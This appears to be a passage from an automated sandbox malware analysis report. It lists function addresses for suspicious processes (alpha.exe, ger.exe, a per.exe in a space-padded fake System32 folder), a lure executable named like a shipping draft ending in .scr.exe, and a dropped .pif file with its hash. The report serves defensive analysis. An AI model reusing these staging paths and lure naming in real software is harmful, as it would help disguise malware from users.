Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC87854 6_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF70CC9AC4C 6_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC85554 9_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC80A6C 9_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC84224 9_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC7AA54 9_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC837D8 9_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC7CE10 9_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC78DF8 9_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC9D9D0 9_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC781D4 9_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC77D30 9_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CCA1538 9_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC76EE4 9_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC97F00 9_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC9EE88 9_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC7E680 9_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC9AA30 9_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC74A30 9_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC72220 9_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC7D250 9_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC79E50 9_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC77650 9_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC75240 9_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC76BE0 9_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC73410 9_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC9AFBC 9_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC75B70 9_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC73F90 9_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC7372C 9_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC79B50 9_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC7B0D8 9_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC78510 9_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC818D4 9_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC71884 9_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC72C48 9_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC87854 9_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF70CC9AC4C 9_2_00007FF70CC9AC4C
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A36054 16_2_00007FF7E0A36054
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A3596C 16_2_00007FF7E0A3596C
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A31664 16_2_00007FF7E0A31664
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A36EC8 16_2_00007FF7E0A36EC8
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A372C0 16_2_00007FF7E0A372C0
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A367A0 16_2_00007FF7E0A367A0
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A36AE8 16_2_00007FF7E0A36AE8
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A383D8 16_2_00007FF7E0A383D8
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A34050 16_2_00007FF7E0A34050
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A35128 16_2_00007FF7E0A35128
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A34318 16_2_00007FF7E0A34318
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A39890 16_2_00007FF7E0A39890
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A37C7C 16_2_00007FF7E0A37C7C
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A37670 16_2_00007FF7E0A37670
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A32D70 16_2_00007FF7E0A32D70
Source: C:\Users\Public\ger.exe Code function: 16_2_00007FF7E0A39C74 16_2_00007FF7E0A39C74
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF91EF0 17_2_00007FF6FEF91EF0
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF97D50 17_2_00007FF6FEF97D50
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF93D60 17_2_00007FF6FEF93D60
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF91358 17_2_00007FF6FEF91358
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF9567C 17_2_00007FF6FEF9567C
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF95B8C 17_2_00007FF6FEF95B8C
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF930B0 17_2_00007FF6FEF930B0
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF95114 17_2_00007FF6FEF95114
Source: C:\Windows \System32\per.exe Code function: 17_2_00007FF6FEF97928 17_2_00007FF6FEF97928
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC78DF8 31_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC85554 31_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC7AA54 31_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC837D8 31_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC73410 31_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC7CE10 31_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC9D9D0 31_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC781D4 31_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC77D30 31_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CCA1538 31_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC76EE4 31_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC97F00 31_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC80A6C 31_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC9EE88 31_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC7E680 31_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC9AA30 31_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC74A30 31_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC84224 31_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC72220 31_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC7D250 31_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC79E50 31_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC77650 31_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC75240 31_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC76BE0 31_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC9AFBC 31_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC75B70 31_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC73F90 31_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC7372C 31_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC79B50 31_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC7B0D8 31_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC78510 31_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC818D4 31_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC71884 31_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC72C48 31_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC87854 31_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe Code function: 31_2_00007FF70CC9AC4C 31_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC78DF8 32_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC85554 32_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC7AA54 32_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC837D8 32_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC73410 32_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC87854 32_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC7CE10 32_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC9D9D0 32_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC781D4 32_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC77D30 32_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CCA1538 32_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC76EE4 32_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC97F00 32_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC80A6C 32_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC9EE88 32_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC7E680 32_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC9AA30 32_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC74A30 32_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC84224 32_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC72220 32_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC7D250 32_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC79E50 32_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC77650 32_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC75240 32_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC76BE0 32_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC9AFBC 32_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC75B70 32_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC73F90 32_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC7372C 32_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC79B50 32_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC7B0D8 32_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC78510 32_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC818D4 32_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC71884 32_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC72C48 32_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe Code function: 32_2_00007FF70CC9AC4C 32_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC78DF8 34_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC85554 34_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC7AA54 34_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC837D8 34_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC73410 34_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC87854 34_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC7CE10 34_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC9D9D0 34_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC781D4 34_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC77D30 34_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CCA1538 34_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC76EE4 34_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC97F00 34_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC80A6C 34_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC9EE88 34_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC7E680 34_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC9AA30 34_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC74A30 34_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC84224 34_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC72220 34_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC7D250 34_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC79E50 34_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC77650 34_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC75240 34_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC76BE0 34_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC9AFBC 34_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC75B70 34_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC73F90 34_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC7372C 34_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC79B50 34_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC7B0D8 34_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC78510 34_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC818D4 34_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC71884 34_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC72C48 34_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe Code function: 34_2_00007FF70CC9AC4C 34_2_00007FF70CC9AC4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044B040 36_2_0044B040
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0043610D 36_2_0043610D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00447310 36_2_00447310
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044A490 36_2_0044A490
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040755A 36_2_0040755A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0043C560 36_2_0043C560
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044B610 36_2_0044B610
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044D6C0 36_2_0044D6C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_004476F0 36_2_004476F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044B870 36_2_0044B870
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044081D 36_2_0044081D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00414957 36_2_00414957
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_004079EE 36_2_004079EE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00407AEB 36_2_00407AEB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044AA80 36_2_0044AA80
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00412AA9 36_2_00412AA9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00404B74 36_2_00404B74
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00404B03 36_2_00404B03
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0044BBD8 36_2_0044BBD8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00404BE5 36_2_00404BE5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00404C76 36_2_00404C76
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00415CFE 36_2_00415CFE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00416D72 36_2_00416D72
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00446D30 36_2_00446D30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00446D8B 36_2_00446D8B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_00406E8F 36_2_00406E8F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00405038 37_2_00405038
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0041208C 37_2_0041208C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_004050A9 37_2_004050A9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0040511A 37_2_0040511A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0043C13A 37_2_0043C13A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_004051AB 37_2_004051AB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00449300 37_2_00449300
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0040D322 37_2_0040D322
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0044A4F0 37_2_0044A4F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0043A5AB 37_2_0043A5AB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00413631 37_2_00413631
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00446690 37_2_00446690
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0044A730 37_2_0044A730
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_004398D8 37_2_004398D8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_004498E0 37_2_004498E0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0044A886 37_2_0044A886
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0043DA09 37_2_0043DA09
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00438D5E 37_2_00438D5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00449ED0 37_2_00449ED0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_0041FE83 37_2_0041FE83
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00430F54 37_2_00430F54
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\glrkszlG.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 028B7CC8 appears 43 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 27974E10 appears 54 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 028A480C appears 606 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 028A6650 appears 37 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 028A46A4 appears 152 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: String function: 00416760 appears 69 times
Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF70CC96D1C appears 36 times
